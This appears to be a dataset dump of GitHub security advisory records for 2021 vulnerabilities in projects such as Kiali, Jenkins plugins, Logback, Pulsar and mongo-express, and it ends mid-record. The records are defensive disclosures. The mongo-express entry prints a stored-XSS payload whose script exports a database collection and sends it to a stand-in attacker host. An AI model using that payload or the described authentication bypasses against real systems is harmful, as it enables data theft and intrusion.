schema_version
stringclasses
1 value
id
stringlengths
19
19
modified
stringlengths
20
20
published
stringlengths
20
20
withdrawn
stringlengths
20
20
aliases
stringlengths
2
20
summary
stringlengths
3
183
details
stringlengths
9
12.9k
severity
stringlengths
2
92
affected
stringlengths
84
2.74k
references
stringlengths
99
16.4k
database_specific
stringlengths
131
210
1.4.0
GHSA-ggjr-2f7v-vhq4
2022-08-11T16:53:09Z
2021-06-01T21:57:08Z
null
['CVE-2021-20278']
Kiali Authentication Bypass vulnerability
An authentication bypass vulnerability was found in Kiali in versions before 1.31.0 when the authentication strategy `OpenID` is used. When RBAC is enabled, Kiali assumes that some of the token validation is handled by the underlying cluster. When OpenID `implicit flow` is used with RBAC turned off, this token validation doesn't occur, and this allows a malicious user to bypass the authentication.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.31.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20278'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1937171'}, {'type': 'WEB', 'url': 'https://kiali.io/news/security-bulletins/kiali-security-002/'}]
{'cwe_ids': ['CWE-287', 'CWE-290'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T17:44:07Z', 'nvd_published_at': '2021-05-28T11:15:00Z'}
1.4.0
GHSA-h6qv-f5gf-8gcf
2022-12-15T18:21:22Z
2021-06-16T17:29:35Z
null
['CVE-2021-21654']
Missing Authorization in Jenkins P4 plugin
Jenkins P4 Plugin 1.11.4 and earlier does not perform permission checks in multiple HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified Perforce server using attacker-specified username and password. P4 Plugin 1.11.5 requires Overall/Administer for the affected HTTP endpoints.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:p4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.11.4'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21654'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/p4-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2327'}]
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T18:33:13Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}
1.4.0
GHSA-7p7h-4mm5-852v
2023-09-08T19:23:55Z
2021-06-07T22:10:39Z
null
['CVE-2021-33623']
Uncontrolled Resource Consumption in trim-newlines
@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the `.end()` method.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'trim-newlines'}, 'ecosystem_specific': {'affected_functions': ['trim-newlines.trimNewlines.end']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'trim-newlines'}, 'ecosystem_specific': {'affected_functions': ['trim-newlines.trimNewlines.end']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.1'}]}], 'versions': ['4.0.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33623'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/trim-newlines/commit/25246c6ce5eea1c82d448998733a6302a4350d91'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/trim-newlines/commit/b10d5f4afef832b16bc56d49fc52c68cbd403869'}, {'type': 'PACKAGE', 'url': 'https://github.com/sindresorhus/trim-newlines'}, {'type': 'WEB', 'url': 'https://github.com/sindresorhus/trim-newlines/releases/tag/v4.0.1'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/12/msg00033.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210702-0007/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/trim-newlines'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T18:22:04Z', 'nvd_published_at': '2021-05-28T18:15:00Z'}
1.4.0
GHSA-wq3r-jwrq-xg6w
2021-06-24T18:04:47Z
2021-06-28T16:57:23Z
null
[]
Canceling of orders not related to the logged-in user
### Impact Canceling of orders not related to the logged-in user ### Patches We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 ### Workarounds For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.1.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-wq3r-jwrq-xg6w'}, {'type': 'WEB', 'url': 'https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659'}, {'type': 'WEB', 'url': 'https://www.shopware.com/en/download/#shopware-6'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T18:04:47Z', 'nvd_published_at': None}
1.4.0
GHSA-cf55-rq8x-hm6f
2021-05-28T18:00:48Z
2021-06-29T21:25:33Z
null
['CVE-2021-33497']
Path Traversal in Dutchcoders transfer.sh
Dutchcoders transfer.sh before 1.2.4 allows Directory Traversal for deleting files.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/dutchcoders/transfer.sh'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33497'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/pull/373'}, {'type': 'WEB', 'url': 'https://github.com/dutchcoders/transfer.sh/releases/tag/v1.2.4'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/44'}]
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:00:48Z', 'nvd_published_at': '2021-05-24T05:15:00Z'}
1.4.0
GHSA-q4hm-fwc9-hmv6
2022-04-18T21:55:54Z
2021-06-16T17:53:20Z
null
['CVE-2021-23331']
Insecure temporary file used in com.squareup:connect
This affects all versions of package com.squareup:connect. The method prepareDownloadFilecreates creates a temporary file with the permissions bits of -rw-r--r-- on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. A workaround fix for this issue is to set the system property java.io.tmpdir to a safe directory as remediation. Note: This version of the SDK is end of life and no longer maintained, please upgrade to the latest version.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.squareup:connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.20191120.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23331'}, {'type': 'PACKAGE', 'url': 'https://github.com/square/connect-java-sdk'}, {'type': 'WEB', 'url': 'https://github.com/square/connect-java-sdk/blob/master/src/main/java/com/squareup/connect/ApiClient.java%23L613'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMSQUAREUP-1065988'}]
{'cwe_ids': ['CWE-377'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:46:28Z', 'nvd_published_at': '2021-02-03T18:15:00Z'}
1.4.0
GHSA-m6cp-vxjx-65j6
2022-02-08T21:21:05Z
2021-06-23T20:23:04Z
null
['CVE-2021-34428']
SessionListener can prevent a session from being invalidated breaking logout
### Impact If an exception is thrown from the `SessionListener#sessionDestroyed()` method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in. There is no known path for an attacker to induce such an exception to be thrown, thus they must rely on an application to throw such an exception. The OP has also identified that during the call to `sessionDestroyed`, the `getLastAccessedTime()` throws an `IllegalStateException`, which potentially contrary to the servlet spec, so applications calling this method may always throw and fail to log out. If such an application was only tested on a non clustered test environment, then it may be deployed on a clustered environment with multiple contexts and fail to log out. ### Workarounds The application should catch all Throwables within their `SessionListener#sessionDestroyed()` implementations.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.4.41'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.4.40'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.2'}}]
[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-m6cp-vxjx-65j6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34428'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project/'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210813-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4949'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]
{'cwe_ids': ['CWE-613'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T16:41:00Z', 'nvd_published_at': '2021-06-22T15:15:00Z'}
1.4.0
GHSA-m5vx-8chx-qvmm
2021-07-29T14:34:11Z
2021-06-22T15:15:08Z
null
['CVE-2021-32697']
Form validation can be skipped
### Impact By crafting a special `GET` request containing a valid form state, a form can be submitted without invoking any validators. We consider the severity _low_ because it is not possible to _change_ any form values since the form state is secured with an HMAC that is still verified. That means that this issue can only be exploited if Form Finishers cause side effects even if no form values have been sent. ### Patches https://github.com/neos/form/commit/69de4219b1f58157e2be6b05811463875d75c246 ### Workarounds Form Finishers can be adjusted in a way that they only execute an action if the submitted form contains some expected data. Alternatively a custom Finisher can be added as first finisher. ### References This regression was introduced with https://github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567 Original report: https://tickets.neos.io/#ticket/zoom/411 (internal)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'neos/form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '4.3.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'neos/form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'neos/form'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/neos/form/security/advisories/GHSA-m5vx-8chx-qvmm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32697'}, {'type': 'WEB', 'url': 'https://github.com/neos/form-ghsa-m5vx-8chx-qvmm/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/neos/form/commit/049d415295be8d4a0478ccba97dba1bb81649567'}, {'type': 'WEB', 'url': 'https://github.com/neos/form/commit/69de4219b1f58157e2be6b05811463875d75c246'}, {'type': 'WEB', 'url': 'https://github.com/neos/form/releases/tag/5.1.3'}]
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-21T17:39:52Z', 'nvd_published_at': '2021-06-21T19:15:00Z'}
1.4.0
GHSA-vmfg-rjjm-rjrj
2022-11-17T20:55:47Z
2021-06-07T16:07:36Z
null
['CVE-2017-5929']
QOS.ch Logback vulnerable to Deserialization of Untrusted Data
QOS.ch Logback before 1.2.0 has a serialization vulnerability affecting the SocketServer and ServerSocketReceiver components. The RemoteStreamAppenderClient class in logback-classic and the SocketNode classes in logback-classic and logback-access allow data to be deserialized over a Java Socket, via an ObjectInputStream, without validating the data beforehand. When data is received from the Socket, to be logged, it is deserialized into Java objects.An attacker can exploit this vulnerability by sending malicious, serialized Java objects over the connection to the Socket, which may result in execution of arbitrary code when those objects are deserialized. Note that although logback-core is implicated by the Logback project here, the Sonatype Security Research team discovered that the vulnerability is actually present in the logback-classic and logback-access components. Versions prior to 1.2.0 are vulnerable, as stated in the advisory.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'ch.qos.logback:logback-classic'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'ch.qos.logback:logback-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-5929'}, {'type': 'WEB', 'url': 'https://github.com/qos-ch/logback/commit/f46044b805bca91efe5fd6afe52257cd02f775f8'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1675'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1676'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2017:1832'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2018:2927'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5929'}, {'type': 'PACKAGE', 'url': 'https://github.com/qos-ch/logback'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/18d509024d9aeb07f0e9579066f80bf5d4dcf20467b0c240043890d1@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/a6db61616180d73711d6db25703085940026e2dbc40f153f9d22b203@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/fa4eaaa6ff41ac6f79811e053c152ee89b7c5da8a6ac848ae97df67f@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0bb19330e48d5ad784fa20dacba9e5538d8d60f5cd9142e0f1432b4b@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2a08573ddee4a86dc96d469485a5843a01710ee0dc2078dfca410c79@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c2d57ca180e8173c90fe313ddf8eabbdcf8e3ae196f8b9f42599790@%3Ccommits.mnemonic.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r397bf63783240fbb5713389d3f889d287ae0c11509006700ac720037@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4673642893562c58cbee60c151ded6c077e8a2d02296e862224a9161@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r632ec30791b441e2eb5a3129532bf1b689bf181d0ef7daf50bcf0fd6@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r718f27bed898008a8e037d9cc848cfc1df4d18abcbaee0cb0c142cfb@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r967953a14e05016bc4bcae9ef3dd92e770181158b4246976ed8295c9@%3Cdev.brooklyn.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra007cec726a3927c918ec94c4316d05d1829c49eae8dc3648adc35e2@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbb4dfca2f7e3e8f3570eec21c79832d33a51dfde6762725660b60169@%3Cdev.mnemonic.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc5f0cc2f3b153bdf15ee7389d78585829abc9c7af4d322ba1085dd3e@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd2227af3c9ada2a72dc72ed05517f5857a34d487580e1f2803922ff9@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re9b787727291786dfe088e3cd078c7d195c0b5781e15d3cd24a3b2fc@%3Cdev.mnemonic.apache.org%3E'}, {'type': 'WEB', 'url': 'https://logback.qos.ch/news.html'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T20:45:34Z', 'nvd_published_at': '2017-03-13T06:59:00Z'}
1.4.0
GHSA-3cv4-xxv7-934q
2022-06-06T18:16:01Z
2021-06-01T21:53:49Z
null
['CVE-2021-22160']
Improper Verification of Cryptographic Signature in Apache Pulsar in TensorFlow
If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22160'}, {'type': 'WEB', 'url': 'https://github.com/apache/pulsar/releases/tag/v2.7.2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r08c7df60cae031361df7fbac39d08b6d5b5079e74db5195d409db9a2@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r347650d15a3e9c5f58b83e918b6ad6dedc2a63d3eb63da8e6a7be87e%40%3Cusers.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e545559781231a83bf0644548c660255859e52feb86bbfcd42590da@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9a12b4da2f26ce9b8f7e7117a879efaa973dab7e54717bbc7923fab1%40%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra49cb62105154e4795b259c79a6b27d63bfa2ab5787ff8529b089550@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra49cb62105154e4795b259c79a6b27d63bfa2ab5787ff8529b089550@%3Cusers.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe845aa1573a61769b9c5916c62971f4b10de87c2ea5f38a97f0cf84@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca54f4b26ba5e6f2e39732b47ec51640e89f57e3b6a38ac3bab314df@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re2ae364e0c02093dc721699698c6f23cfbba0220c78b5e28cafeae81@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf2e90942996dceebac8296abf39257cfeb5ae918f82f7af3d37a48c5@%3Cdev.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf54fefc25c49d4715d484133d438f13bf2e515a5fed5d3a745d4f6e7@%3Ccommits.pulsar.apache.org%3E'}]
{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-01T20:20:10Z', 'nvd_published_at': '2021-05-26T13:15:00Z'}
1.4.0
GHSA-7p8h-86p5-wv3p
2021-06-22T15:44:45Z
2021-06-28T17:18:04Z
null
['CVE-2021-21422']
Cross-site scripting
Two kinds of XSS were found: 1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. 2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. ### Impact As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload: ```JSON {"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" } ``` This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible. ### Patches Upgrade to `v1.0.0-alpha.4` ### For more information If you have any questions or comments about this advisory: * Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new) * Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'mongo-express'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-alpha.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-alpha.2'}}]
[{'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21422'}, {'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/issues/577'}, {'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-21T17:53:12Z', 'nvd_published_at': '2021-06-21T19:15:00Z'}
1.4.0
GHSA-fvfc-8pqr-wjpv
2023-05-24T14:43:36Z
2021-06-16T17:29:08Z
null
['CVE-2021-21650']
Missing Authorization in Jenkins S3 publisher Plugin
Jenkins S3 publisher Plugin prior to 0.11.7 and 0.11.5.1 does not perform Run/Artifacts permission checks in various HTTP endpoints and API models. This allows attackers with Item/Read permission to obtain information about artifacts uploaded to S3, if the optional Run/Artifacts permission is enabled. S3 publisher Plugin 0.11.7 and 0.11.5.1 requires Run/Artifacts permission to obtain information about artifacts if this permission is enabled.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:s3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.6'}, {'fixed': '0.11.7'}]}], 'versions': ['0.11.6']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:s3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.5.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21650'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21650.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2200'}]
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:02:05Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}
1.4.0
GHSA-qj26-7grj-whg3
2023-02-09T19:59:34Z
2021-06-23T17:18:49Z
null
['CVE-2018-6558']
Privilege Escalation in fscrypt
The pam_fscrypt module in fscrypt before 0.2.4 may incorrectly restore primary and supplementary group IDs to the values associated with the root user, which allows attackers to gain privileges via a successful login through certain applications that use Linux-PAM (aka pam).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/google/fscrypt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-6558'}, {'type': 'WEB', 'url': 'https://github.com/google/fscrypt/issues/77'}, {'type': 'WEB', 'url': 'https://github.com/google/fscrypt/commit/3022c1603d968c22f147b4a2c49c4637dd1be91b'}, {'type': 'WEB', 'url': 'https://github.com/google/fscrypt/commit/315f9b042237200174a1fb99427f74027e191d66'}, {'type': 'PACKAGE', 'url': 'https://github.com/google/fscrypt'}, {'type': 'WEB', 'url': 'https://launchpad.net/bugs/1787548'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0027'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:04:58Z', 'nvd_published_at': None}
1.4.0
GHSA-9mgm-gcq8-86wq
2021-04-05T22:53:40Z
2021-06-16T17:39:35Z
null
['CVE-2021-26117']
Improper Authentication in Apache ActiveMQ and Apache Artemis
The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid users password in error, resulting in no check on the password.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
